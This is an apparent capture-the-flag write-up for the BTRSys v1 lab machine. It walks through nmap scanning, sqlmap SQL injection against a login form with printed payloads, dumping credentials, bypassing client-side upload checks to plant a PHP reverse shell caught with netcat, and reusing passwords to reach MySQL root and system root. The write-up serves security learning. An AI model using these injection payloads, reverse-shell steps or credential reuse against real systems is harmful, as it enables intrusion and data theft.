BTRSys v1 – Writeup


This machine is,195/

Recon Phase

To start I had to locate the target on the machine on the network

root@kali:~# nmap -sn
Nmap scan report for
Host is up (0.00053s latency).
MAC Address: 0A:00:27:00:00:18 (Unknown)
Nmap scan report for
Host is up (0.00034s latency).
MAC Address: 08:00:27:90:BD:63 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00084s latency).
MAC Address: 08:00:27:C8:24:AB (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.78 seconds

With the target on I ran a service discovery scan

root@kali:~# nmap -sV
Nmap scan report for
Host is up (0.010s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:C8:24:AB (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.21 seconds

Next I ran some standard scripts against it

root@kali:~# nmap -sC
Nmap scan report for
Host is up (0.0025s latency).
Not shown: 997 closed ports
21/tcp open  ftp
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http
|_http-title: BTRisk
MAC Address: 08:00:27:C8:24:AB (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 1.39 seconds

Shell Hunting

Instantly noticing that the ftp server allows anonymous logins so I went to in browser to see if there is anything

Screenshot 1

As nothing came out of that I moved onto the webserver on

Screenshot 2

The first two links were cyclic, leading back to the page I was already on, but the 3rd led to

Screenshot 3

With nothing helpful here, I setup dirbuster

Screenshot 4

Screenshot 5

I first went to

Screenshot 6

And in it’s source

Screenshot 7

This looked like some form of validation for a file upload, but there was nowhere to do it. Keeping this in mind I moved on to

Screenshot 8

Again I found some stuff in the source

Screenshot 9

Screenshot 10

From this it seemed there was some client side validations, one checking for “‘” being used as the password, which is a quick way for checking SQL injection vulns, and the other attempts to ensure “” is in the username, I wanted to use sql map so I checked what the parameters were called and set it up

root@kali:~# sqlmap -u --data="[email protected]&parola=password" --level=5 --risk=3
Parameter: kullanici_adi (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: kullanici_adi=-1494' OR 8408=8408-- YdXg&parola=password
    Type: error-based
    Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: [email protected]' OR ROW(7541,1564)>(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT (ELT(7541=7541,1))),0x7170626271,FLOOR(RAND(0)*2))x FROM (SELECT 1204 UNION SELECT 8891 UNION SELECT 5908 UNION SELECT 3378)a GROUP BY x)-- TrtT&parola=password
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: [email protected]' OR SLEEP(5)-- SPlv&parola=password
[15:01:53] [INFO] the back-end DBMS is MySQL

With a confirmed SQL injection vuln I setup sqlmap to dump that data

root@kali:~# sqlmap -u --data="[email protected]&parola=password" --level=5 --risk=3 --dump
Database: deneme
Table: user
[2 entries]
| ID | Parola    | BabaAdi | AnneAdi | Ad_Soyad    | AnneMeslegi | BabaMeslegi | KardesSayisi | Kullanici_Adi    |
| 1  | asd123*** | ahmet   | nazli   | ismail kaya | lokantaci   | muhasebe    | 5            | [email protected] |
| 2  | asd123*** | mahmut  | gulsah  | can demir   | tuhafiyeci  | memur       | 8            | [email protected] |

Now with access to some credentials I tested them on the login page at using “[email protected]:asd123***” as my creds which redirected me to again but this time there was no error

Screenshot 11

With an upload box present I took a copy of a php reverse shell from /usr/share/webshells/php/php-reverse-shell.php and set it up to point to me, from here I attempted to upload it

Screenshot 12

I translated this and it was telling me I could only upload JPG or PNGs, now I had previously found the validation for this in the javascript of the page, but I had taken a week break to go on holiday while doing this box and had forgotten. So I made a copy of the reverse shell with a .png extension in an attempt to check upload actually worked

Screenshot 13

This translated to “File uploaded!” and having previously seen a folder called /uploads at so I went to check it out

Screenshot 14

The upload worked, but wasn’t helpful. I then went over my notes from before I went on holiday and suddenly realised I had already found the validation in the source code of the page

Screenshot 15

As the validation was client side, I redefined the getFile function to be

function getFile(){ document.myform.submit(); }

To redefine the function I put the definition into the console of the dev tools

Screenshot 16

I then selected “php-reverse-shell.php” to be uploaded and then called “getFile()” from the devconsole

Screenshot 17

Screenshot 18

With the file uploaded I went to

Screenshot 19

With the file ready, I setup a listener to receive the connection

root@kali:~# nc -nlvp 4444

I then clicked on php-reverse-shell.php to trigger it and checked the listener

connect to [] from (UNKNOWN) [] 44131
Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
 09:21:28 up  3:27,  0 users,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off

And with that I had a shell

Priv Esc

To start with I spawned a nicer shell

$ python -c "import pty;pty.spawn('/bin/bash')"

From here I checked out the users list

www-data@BTRsys1:/$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
ftp:x:104:112:ftp daemon,,,:/srv/ftp:/bin/false
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false

Then I went to check the home directories

www-data@BTRsys1:/$ cd /home
www-data@BTRsys1:/home$ ls -la
drwxr-xr-x  3 root root 4096 Aug  9  2014 .
drwxr-xr-x 21 root root 4096 Aug  9  2014 ..
drwxr-xr-x  3 1000 1000 4096 Aug 13  2014 troll
www-data@BTRsys1:/home/troll$ ls -la
drwxr-xr-x 3 1000 1000 4096 Aug 13  2014 .
drwxr-xr-x 3 root root 4096 Aug  9  2014 ..
-rw------- 1 1000 1000    0 Aug 13  2014 .bash_history
drwx------ 2 1000 1000 4096 Aug  9  2014 .cache
-rw-r--r-- 1 1000 1000  675 Aug  9  2014 .profile
-rw------- 1 1000 1000  976 Aug  9  2014 .viminfo

The home dirs of the users were missing. So, I went to the web directory to check the config.php I found earlier for any sort of creds

www-data@BTRsys1:/home/troll$ cd /var/www/html
www-data@BTRsys1:/var/www/html$ ls -la
drwxr-xr-x 8 root root 4096 Apr 28  2017 assets
-rw-r--r-- 1 root root  356 Mar 20  2017 config.php
-rw-r--r-- 1 root root  856 Apr 28  2017 gonder.php
-rw-r--r-- 1 root root 9311 Apr 28  2017 hakkimizda.php
-rw-r--r-- 1 root root  796 Mar 23  2017 index.php
-rw-r--r-- 1 root root 4561 Apr 28  2017 login.php
-rw-r--r-- 1 root root 3517 May  3  2017 personel.php
-rw-r--r-- 1 root root 2143 Apr 28  2017 sorgu.php
drwxrwxrwx 2 root root 4096 Aug 21 09:05 uploads
www-data@BTRsys1:/var/www/html$ cat config.php
if (mysqli_connect_errno())
  echo "Mysql Bağlantı hatası!: " . mysqli_connect_error();

I had the root password for the mysql system, so I checked who it was running as

www-data@BTRsys1:/var/www/html$ ps -aux | grep mysql
mysql      827  0.0  4.0 327068 41196 ?        Ssl  05:53   0:08 /usr/sbin/mysqld
www-data  3184  0.0  0.0   2604   564 pts/0    S+   11:28   0:00 grep mysql

I decided to login to the mysql server

www-data@BTRsys1:/var/www/html$ mysql -u root -p
Enter password:

I used “toor” as the password

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 48
Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu)
Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

From this I went to look for more things in the database encase sqlmap didn’t get it all

mysql> show databases;
| Database           |
| information_schema |
| deneme             |
| mysql              |
| performance_schema |
4 rows in set (0.00 sec)
mysql> use deneme;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
| Tables_in_deneme |
| user             |
1 row in set (0.00 sec)
mysql> select * from user;
| ID | Ad_Soyad    | Kullanici_Adi    | Parola    | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi |
|  1 | ismail kaya | [email protected] | asd123*** | ahmet   | muhasebe    | nazli   | lokantaci   |            5 |
|  2 | can demir   | [email protected] | asd123*** | mahmut  | memur       | gulsah  | tuhafiyeci  |            8 |
2 rows in set (0.00 sec)

This didn’t reveal anything new, and after a bit of digging I hadn’t got anything yet. I decided to try the passwords I had for root

www-data@BTRsys1:/var/www/html$ su

I started with “toor”

su: Authentication failure

I then tried the password both users had “asd123***”

www-data@BTRsys1:/var/www/html$ su

I took a look in /root for a flag

root@BTRsys1:/var/www/html# cd /root
root@BTRsys1:~# ls -la
drwx------  4 root root 4096 May  2  2017 .
drwxr-xr-x 21 root root 4096 Aug  9  2014 ..
lrwxrwxrwx  1 root root   27 Apr 28  2017 apache.conf -> /etc/phpmyadmin/apache.conf
-rw-------  1 root root 2634 May  5  2017 .bash_history
drwx------  2 root root 4096 Apr 28  2017 .cache
lrwxrwxrwx  1 root root   19 Apr 28  2017 conf.d -> /etc/apache2/conf.d
lrwxrwxrwx  1 root root   19 Apr 28  2017 conf.f -> /etc/apache2/conf.f
-rw-------  1 root root    8 May  5  2017 .nano_history
lrwxrwxrwx  1 root root   21 Apr 28  2017 phpmyadmin -> /usr/share/phpmyadmin
lrwxrwxrwx  1 root root   35 Apr 28  2017 phpmyadmin.conf -> /etc/apache2/conf.d/phpmyadmin.conf
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4096 Aug 10  2014 .ssh
-rw-------  1 root root 5778 May  2  2017 .viminfo

But there wasn’t one, but, the machine was done!

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.